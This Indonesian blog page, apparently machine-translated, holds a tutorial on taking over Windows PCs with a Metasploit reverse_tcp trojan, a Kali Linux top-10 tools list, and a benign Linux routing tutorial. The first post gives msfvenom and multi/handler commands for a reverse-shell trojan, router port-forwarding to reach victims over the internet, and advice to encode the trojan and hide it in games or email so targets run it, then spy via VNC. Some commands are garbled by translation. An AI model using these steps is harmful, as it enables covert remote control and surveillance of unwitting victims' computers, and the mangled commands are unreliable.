IBX5A959F0622B93
Tampilkan postingan dengan label Kali linux. Tampilkan semua postingan
Tampilkan postingan dengan label Kali linux. Tampilkan semua postingan

Selasa, 27 Februari 2018

Cara Hack windows 10 menggunakan Kali linux Dengan Metasploit

Microsoft mengklaim bahwa windows 10 telah memperbaiki semua kerentanan keamanan. Kita bisa hack windows PC dengan remote exploit seperti "ms08_067_netapi" lagi. Windows telah memperbaiki kerentanan itu. sangat sedih. Tunggu sebentar, Lalu bagaimana kita bisa hack windows pc itu bahkan mungkin sekarang? Jawabannya adalah ya, mesin windows masih rentan terhadap serangan Trojan terlepas dari versinya. Dengan metode ini Anda bisa membobol semua mesin windows 10,8.1,8,7, vista dan xp.
Sebuah trojan atau backdoor dapat memberikan akses ke mesin target dari jarak jauh. Kita semua tahu itu, saya tidak akan terlalu dalam untuk menjelaskan apa itu trojan. Disini kita akan menggunakan trojan reverse_tcp. Ini adalah malware khusus yang membuat koneksi jarak jauh ke mesin hacker melalui Protokol Kontrol Transisi dari mesin korban. Hal ini memungkinkan hacker untuk masuk ke mesin dan mengendalikannya sepenuhnya.
Metasploit framework adalah salah satu tool terbaik yang saya sukai di kali linux. Ini memiliki generator handler dan payload. Setelah payload dijalankan pada mesin target saat kita sedang mendengarkan mode di bagian handler, ia menumbuhkan sebuah shell meterpreter. Shell meterpreter ini memungkinkan kita untuk berkomunikasi dengan sistem target dan mengeksekusi perintah shell. Dibandingkan dengan pengukur meter shell biasa ada banyak pilihan. Ini bisa dilakukan saat target berada di jaringan LAN yang sama atau melalui internet, tidak ada bedanya anda hanya perlu mengkonfigurasi router dan payload yang sesuai. Proses ini mati sederhana. Ikuti langkah-langkahnya.

Video Demo


 Konfigurasi Router
Langkah ini sangat penting bila target anda sudah lewat internet atau WAN. Abaikan langkah ini jika target Anda berada di LAN yang sama. Untuk hack pc melalui internet berarti Anda harus berkomunikasi di kedua arah. Untuk melakukan ini, router / modem Anda harus membuka port mesin Anda. Ini disebut port forwarding. Secara default semua port ditutup oleh router / modem anda. Buka browser ke url http://192.168.1.1 Ketik username dan password anda (secara default password dan username akan menjadi " admin"). Ini akan membawa Anda ke pengaturan router. Buka Pengaturan lanjutan menemukan port forwarding. Sekarang klik add new set start dan end port menjadi 444 (karena kita menggunakan port 444 pada metasploit). Di kolom alamat Ip Anda harus mengetikkan ip internal mesin linux Anda. Simpan Pengaturan. kamu selesai. Anda dapat memeriksa ulang dengan memindai port Anda dengan pemindai port online.


Menghasilkan Trojan

Buat payload menggunakan msfvenom. atur port ke 444 dan ip ke IP publik atau IP lokal Anda tergantung pada target Anda. Trojan yang dihasilkan akan mencoba terhubung ke IP dan port ini saat dieksekusi. Perintah berikut akan menghasilkan trojan dalam format .exe.
# msfvenom -p windows / meterpreter / reverse_tcp - platform windows-a x86 -f exe LHOST = "ip penyerang" LPORT = 444 -o /root/Desktop/trojan.exe
  
Sebuah trojan akan dihasilkan di desktop. sisihkan dan beralih ke bagian handler. jalankan metasploit dan ikuti langkahnya.
# msfconsole
Tunggu sebentar, msfconsole akan muncul. Gunakan handler lalu, set payload dan port.
1. Handler
msf> gunakan multi / handler
2. set payload
msf exploit (handler)> atur jendela PAYLOAD / meterpreter / reverse_tcp
3. Setel port lokal
msf exploit (handler)> atur LPORT 444
4. Tetapkan host lokal
msf exploit (handler)> set LHOST "attacker ip"
5. memanfaatkan
msf exploit (handler)> exploit
Tunggu target untuk menghubungkan kembali
msf exploit (handler)> exploit 
[*] Memulai handler terbalik di 192.168.1.104:444 
[*] Memulai handler payload ...


Jalankan muatannya

Sekarang Anda harus menjalankan trojan Anda pada sistem target. Mendistribusikan file exe mentah adalah ide yang buruk, lebih baik menyandikannya dan melampirkan aplikasi normal atau permainan atau bahkan email. Setelah keluar trojan masuk dan dieksekusi sesi meterpreter akan ditelurkan.

[*] Memulai penangan mundur di 192.168.1.104:444 
[*] Memulai penangan muatan ... 
[*] Mengirim panggung (83170 bytes) ke 192.168.1.105 
[*] Sesi Meterpreter 1 dibuka (192.168.1.104:444 -> 192.168. 1.105: 36028) pada 2016-05-20 03:20:45 -0500 
meterpreter>
Sesi Meterpreter memungkinkan Anda untuk menjalankan perintah sistem, perintah jaringan, memata-matai layar dan banyak lagi.
gunakan perintah help untuk melihat keseluruhan daftar perintah
meterpreter> bantuan
Gunakan perintah ini untuk menjalankan sesi vnc dan memata-matai target
meterpreter> run vnc
Seluruh proses ini sederhana namun, bagian terberat adalah mendapatkan trojan ke pengguna target. Melampirkan file beserta game karya hebat.

10 Tools Teratas Di Kali linux

Kali linux adalah pengujian penetrasi paling canggih yang pernah dibangun OS. Kali linux memiliki banyak alat yang tersedia untuk berbagai serangan. Ini adalah alat keamanan top 10 favorit saya. Ada banyak alat yang tersedia, ini adalah 10 alat yang saya temukan mengagumkan.

10. proxychains

proxychainskalilinuxkhromozome
proxychains adalah salah satu alat yang paling penting dalam kali linux. Proxychains mengarahkan semua lalu lintas aplikasi tertentu melalui server proxy yang diinginkan. Its dapat menutupi identitas pengguna dan mengamankan pengguna dari penyadap. Secara default, proxychains diatur untuk terhubung melalui server proxy dengan protokol yang lebih aman yang disebut SOCKS5. Aplikasi terbaik dari proxychains dijalankan sebagai layanan pada port 9050 dan menjalankan semua aplikasi dengan proxychains. Mudah, stabil dan aman. klik di sini untuk mengetahui lebih banyak tentang anonimitas online.

9. Armitage

armitagekalilinuxkhromozomeArmitage pada dasarnya adalah versi grafis dari kerangka metasploit. Sebagian besar hacker newbie merasa sulit untuk menggunakan metasploit karena merupakan antarmuka baris perintah. Armitage menawarkan GUI yang keren untuk orang-orang ini. Kita bisa menemukan modul exploit atau auxiliary dengan user interface yang lebih mudah, agak seperti file explorer. semua perangkat yang di-hack serta perangkat yang dipindai terlihat seperti antarmuka ikon besar dan sangat mudah untuk diluncurkan menyerang beberapa sistem dalam sekali klik. Untuk jendela konsol penggunaan yang lebih canggih juga tersedia di bagian bawah. Armitage sangat membantu saat Anda ingin membuat atau mengendalikan tentara botnet. Bila Anda ingin mencatat keseluruhan jaringan sistem, armitage akan menjadi pilihan tepat.

8. BeEF

beefframeworkkalilinuxkhromozomeBeEF singkatan dari kerangka eksploitasi Browser. Daging sapi digunakan untuk mengeksploitasi kerentanan xss dan fokus pada serangan sisi klien. Begitu korban mengakses situs rentan xss yang terkait dengan daging sapi, server daging sapi yang berjalan di penyerang mengaitkan browser target. Saat browser ketagihan si penyerang mendapat kontrol penuh atas browser. Penyerang dapat menginstal atau menghapus plugin, menampilkan pop up, mengarahkan ulang ke url rouge. Dengan kerangka ini Anda bisa membuat korban mendownload malware atau Trojan Anda. Daging sapi memiliki antarmuka pengguna yang cukup bagus yang mudah digunakan juga.

7. Aircrack-ng

aircrack-ng-new-logoAircrack bukan hanya alat toolkit yang digunakan untuk serangan nirkabel atau hanya hacking jaringan wifi. Kumpulan alat ini memungkinkan Anda untuk memantau jaringan, memecahkan hash WPA, menangkap jabat tangan dan bahkan mengirim paket deauth. Ini adalah toolkit utama untuk pengujian penetrasi nirkabel. Aircrack di kali linux hadir dengan antarmuka command line yang terlihat keren. Aircrack mendukung hampir semua adapter wifi dan juga tersedia untuk windows. Bagian yang paling menarik adalah ini bisa digunakan sebagai jammer wifi dengan mengirimkan paket deauth tak terbatas ke router dan dengan demikian memutus semua perangkat yang terhubung.

6. HashCat

hashcatkalilinuxkhromozomeHashcat adalah perangkat lunak yang mengagumkan yang bisa memecahkan hampir semua jenis hash. Hashcat memiliki dua varian dengan dua algoritma yang berbeda yaitu CPU cracking yang lain adalah retak GPU. OclHashCat menggunakan algoritma cracking GPU yang sangat cepat dibandingkan cracking CPU biasa. Tidak seperti CPU, GPU memiliki terlalu banyak core. OclHashcat menggunakan multi-core ini untuk memecahkan ribuan hash dalam waktu kurang dari satu detik. Dengan 8x Nvidia Titan x yang berjalan pada ubuntu 64-bit bisa memecahkan upto 115840 mega hash per detik. Alat cracking hash yang hebat ini bisa sangat membantu saat Anda menggunakannya dengan daftar kata biasa atau serangan bruteforce.

5. Nmap

nmapklailinuxkhromozomeNmap alias network mapper adalah alat yang cukup sederhana di kali linux yang memungkinkan Anda untuk memindai sistem atau jaringan. Nmap memungkinkan Anda untuk memindai port terbuka, menjalankan layanan, netbios, deteksi os dll. Nmap menggunakan berbagai jenis teknik deteksi untuk menghindari firewall filter IP. Nmap memiliki antarmuka command line dan GUI dan mendukung hampir semua platform termasuk windows dan mac. Ini alat yang harus anda gunakan sebelum menyerang sistem atau server.

4. vega

vegakalilinuxkhromozomeVega adalah alat rekon canggih yang dilengkapi dengan antarmuka grafis yang dirancang dengan baik. Vega memindai server web dan membantu Anda mendeteksi hampir semua jenis kerentanan termasuk injeksi sql dan xss. Vega memilah link yang rentan terhadap tiga bagian yang berbeda berdasarkan tingkat keparahannya. Vega dapat mendeteksi nomor jaminan sosial dan email id. Ini juga memungkinkan Anda untuk melihat-lihat keseluruhan situs web dengan file manager seperti antarmuka.

3. Reaver

reaverkalilinuxkhromozomeReaver adalah alat terbaik dan sederhana untuk pengujian penetrasi nirkabel. Reaver menargetkan router berkemampuan WPS (Wireless protected setup). Reaver bruteforce semua 6 digit pin yang mungkin sehingga mengambil frasa sandi dari itu. Alat sederhana ini bisa memecahkan wifi dalam waktu sangat singkat tergantung pin wps. Jika router target memiliki pin default, maka reaver bisa memecahkannya dalam waktu 3 - 6 detik. Baca blog saya tentang cara hack router yang dilindungi wps dengan reaver untuk info lebih lanjut.

2. Sqlmap

Saya sqlmapkalilinuxkhromozomen penetrasi pengujian sebagian besar hacker mencoba untuk mencatat database di tempat pertama saat menyerang server web. sqlmap benar-benar kuat alat audit otomatis sepenuhnya untuk menyerang database dengan memanfaatkan sisi server sql kerentanan. Sqlmap hadir dengan antarmuka baris perintah dengan font hijau keren. Sqlmap dapat menargetkan Mysql, Mssql, postgresql, oracle dll dan mendukung hampir semua teknik injeksi. Anda hanya perlu memasukkan sisa link yang rentan sepenuhnya proses otomatis. Sqlmap mendukung mode multithreading dan juga proxy. klik disini untuk membaca blog di sql injection

1. Metasploit Framework


metasploitkalilinuxkhromozomeMetasploit framework alias msf adalah yang terbaik dan tidak ada: 1 tool di kali linux untuk serangan backdooring dan malware. msf memiliki eksploitasi 1500+, modul tambahan 800+ dan muatan 400+ yang lebih dari cukup. Msf dapat menargetkan jenis sistem termasuk jendela, mac, linux, android dan bahkan kamera cctv. Msf bisa menghasilkan backdoor dan mengendalikan sistem yang terinfeksi dengan pawangnya. Ini juga bisa meluncurkan eksploitasi jarak jauh, serangan bruteforce dan masih banyak lagi. CLI yang disederhanakan memungkinkan Anda menavigasi melalui semua eksploitasi dengan mudah dan mengelola sistem yang terinfeksi dengan mudah. klik disini untuk membaca blog di hacking windows 10 dengan metasploit. video tutorial tersedia disini

Minggu, 04 Februari 2018

Cara Menambahkan Rute di Linux


Perintah route digunakan untuk menampilkan / memanipulasi tabel routing IP. Hal ini terutama digunakan untuk mengatur rute statis ke host atau jaringan tertentu melalui antarmuka.
Pada artikel ini kita akan melihat bagaimana memanipulasi tabel routing di Linux dengan menggunakan perintah route.
Pertama-tama kami akan menjelaskan bagaimana routing dilakukan dengan beberapa contoh perintah rute dasar, dan kemudian kami akan menjelaskan dengan menggunakan contoh arsitektur jaringan tentang cara men-setup rute di jaringan Anda.

I. Bagaimana Routing Selesai?

1. Tampilkan Rute yang Ada

perintah rute secara default akan menunjukkan rincian entri tabel routing kernel. Dalam contoh ini, ip-address dari sistem dimana perintah route dieksekusi adalah 192.168.1.157
$ route
Tabel routing IP Kernel
Destination Gateway Genmask Flags Metric Ref Gunakan Iface
192.168.1.0 * 255.255.255.0 U 0 0 0 eth0
Perintah di atas menunjukkan bahwa jika tujuan berada dalam rentang jaringan 192.168.1.0 - 192.168.1.255, maka gateway adalah *, yaitu 0.0.0.0.
Ketika paket dikirim dalam kisaran IP ini, maka alamat MAC dari tujuan ditemukan melalui Protokol ARP dan paketnya akan dikirim ke alamat MAC.
Jika Anda tidak tahu apa itu ARP, Anda harus terlebih dahulu memahami bagaimana protokol ARP bekerja .
Untuk mengirim paket ke tujuan yang tidak berada dalam kisaran ip ini, paket akan diteruskan ke gateway default, yang menentukan perutean lebih lanjut untuk paket itu. Kita akan segera melihatnya.
Secara default perintah route menampilkan nama host dalam outputnya. Kita dapat memintanya untuk menampilkan alamat IP numerik menggunakan opsi -n seperti yang ditunjukkan di bawah ini.
$ route -n
Tabel routing IP Kernel
Destination Gateway Genmask Flags Metric Ref Gunakan Iface
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
0.0.0.0 192.168.1.10 0.0.0.0 UG 0 0 0 eth0

2. Menambahkan Default Gateway

Kita dapat menentukan bahwa paket yang tidak berada dalam jaringan harus diteruskan ke alamat Gateway.
Perintah penambahan rute berikut akan mengatur gateway default sebagai 192.168.1.10.
$ route tambahkan default gw 192.168.1.10
Sekarang perintah route akan menampilkan entri berikut.
$ route
Tabel routing IP Kernel
Destination Gateway Genmask Flags Metric Ref Gunakan Iface
192.168.1.0 * 255.255.255.0 U 0 0 0 eth0
default gateway.co.in 0.0.0.0 UG 0 0 0 eth0
Sekarang kita baru saja menambahkan default gateway ke mesin kita. Untuk memverifikasi apakah bekerja dengan baik, lakukan ping beberapa host eksternal (misalnya, google.com) untuk mengirim paket ICMP.
$ ping www.google.com
Berikut ini adalah urutan evet yang terjadi saat perintah ping di atas dieksekusi.
  1. Pertama, akan meminta server DNS untuk mendapatkan alamat ip google.com (misalnya: 74.125.236.34)
  2. Alamat tujuan (74.125.236.34) tidak berada dalam jangkauan jaringan.
  3. Jadi, di Layer-3 (header IP) IP DESTINATION akan ditetapkan sebagai "74.125.236.34".
  4. Di Layer-2, alamat MAC DESTINATION akan terisi sebagai alamat MAC dari gateway default (192.168.1.10's MAC). MAC akan ditemukan dengan menggunakan ARP seperti yang dijelaskan sebelumnya.
  5. Ketika paket dikirim keluar, switch jaringan (yang bekerja pada Layer-2), mengirim paket ke gateway default karena MAC tujuan adalah gateway.
  6. Setelah gateway menerima paket, berdasarkan tabel routingnya, paket tersebut akan meneruskan paketnya lebih jauh.
2 contoh di atas akan memberi ide bagus tentang bagaimana routing dilakukan dalam jaringan. Sekarang kita akan melihat opsi command line lainnya yang tersedia dengan perintah route.

3. Daftar Informasi Cache Routing Kernel

Kernel menyimpan informasi cache routing untuk merutekan paket lebih cepat. Kita bisa mencantumkan informasi cache routing kernel dengan menggunakan flag -C.
$ rute -Cn
Kernel IP routing cache
Source Destination Gateway Flags Metric Ref Gunakan Iface
192.168.1.157 192.168.1.51 192.168.1.51 0 0 1 eth0
192.168.1.157 74.125.236.69 192.168.1.10 0 0 0 eth0
.
.
.

4. Tolak Routing ke Host atau Jaringan Tertentu

Terkadang kita mungkin ingin menolak routing paket ke host / jaringan tertentu. Untuk melakukan itu, tambahkan entri berikut.
$ route add -host 192.168.1.51 tolak
Seperti yang Anda lihat di bawah, kita tidak dapat mengakses host tertentu (yaitu ,51 host yang baru saja kita tolak).
$ ping 192.168.1.51
hubungkan: Jaringan tidak terjangkau
Namun kita masih bisa mengakses host lain di jaringan (misalnya, .52 host masih bisa diakses).
$ ping 192.168.1.53
PING 192.168.1.53 (192.168.1.53) 56 (84) byte data.
64 byte dari 192.168.1.53: icmp_seq = 1 ttl = 64 waktu = 7,77 ms
Jika Anda ingin menolak keseluruhan jaringan (192.168.1.1 - 192.168.1.255), maka tambahkan entri berikut.
$ route add -net 192.168.1.0 netmask 255.255.255.0 reject
Sekarang, Anda tidak dapat mengakses salah satu host di jaringan itu (misalnya: .51, .52, .53, dst.)
$ ping 192.168.1.51
hubungkan: Jaringan tidak terjangkau

$ ping 192.168.1.52
hubungkan: Jaringan tidak terjangkau

$ ping 192.168.1.53
hubungkan: Jaringan tidak terjangkau

II. Arsitektur Jaringan Sampel (untuk memahami perutean)

Mari kita gunakan contoh arsitektur jaringan berikut untuk contoh lainnya.
Pada diagram di bawah ini, kita memiliki 2 jaringan individual (192.168.1.0 dan 192.168.3.0, dengan subnet mask 255.255.255.0).
Kami juga memiliki mesin "GATEWAY" dengan 3 kartu jaringan. Kartu 1 terhubung ke 192.168.1.0, kartu 2 terhubung ke 192.168.3.0, dan kartu ke-3 terhubung ke dunia luar.

5. Buat 192.168.3. * Dapat diakses dari 192.168.1. *

Sekarang kita perlu menambahkan entri routing sehingga kita bisa melakukan ping 192.168.3. seri alamat ip dari 192.168.1. seri. Titik umum yang kita miliki adalah mesin GATEWAY.
Jadi, pada setiap mesin di 192.168.1. * Jaringan gateway default akan ditambahkan seperti gambar di bawah ini.
$ route tambahkan default gw 192.168.1.10
Sekarang ketika 192.168.1.1 ping 192.168.3.1, ia akan menuju GATEWAY melalui 192.168.1.10.
Di GATEWAY, tambahkan entri perutean berikut.
$ route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.10
Sekarang semua paket yang ditujukan ke 192.168.3. * Jaringan akan diteruskan melalui antarmuka 192.168.3.10, yang kemudian mengirimkan paket ke mesin yang ditangani.

6. Buat 192.168.1. * Dapat diakses dari 192.168.3. *

Hal ini sangat mirip dengan apa yang kita lakukan tadi.
Jadi, pada setiap mesin di 192.168.3. * Jaringan gateway default akan ditambahkan seperti gambar di bawah ini.
$ route tambahkan default gw 192.168.3.10
Di GATEWAY, tambahkan entri perutean berikut.
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.10
Sekarang 192.168.3. * Mesin bisa melakukan ping 192.168.1. * Mesin.

7. Izinkan Akses Internet (Dunia Eksternal)

Dalam dua contoh sebelumnya, kita telah saling menghubungkan 2 jaringan yang berbeda.
Sekarang kita perlu mengakses internet dari 2 jaringan yang berbeda ini. Untuk itu, kita bisa menambahkan routing default (bila tidak ada aturan routing yang cocok) ke 125.250.60.59 yang terhubung ke dunia luar sebagai berikut.
$ route tambahkan default gw 125.250.60.59
Begini Cara kerjanya:
  1. Sekarang saat Anda mencoba mengakses internet (misalnya: ping google.com) dari salah satu mesin ini (misalnya dari 192.168.3.2), berikut ini adalah urutan kejadian yang terjadi.
  2. Karena tujuan (google.com) tidak berada dalam 3. * seri, maka akan diteruskan ke GATEWAY via 3.10 interface
  3. Di GATEWAY, ia memeriksa apakah tujuan berada dalam kisaran 1. *. Dalam contoh ini, tidak.
  4. Ini kemudian memeriksa apakah tujuan berada dalam jarak 2. *. Dalam contoh ini, tidak
  5. Akhirnya, dibutuhkan rute default untuk meneruskan paket (misalnya menggunakan antarmuka 125.250.60.59, yang terhubung ke dunia luar).

Daftar Blog Saya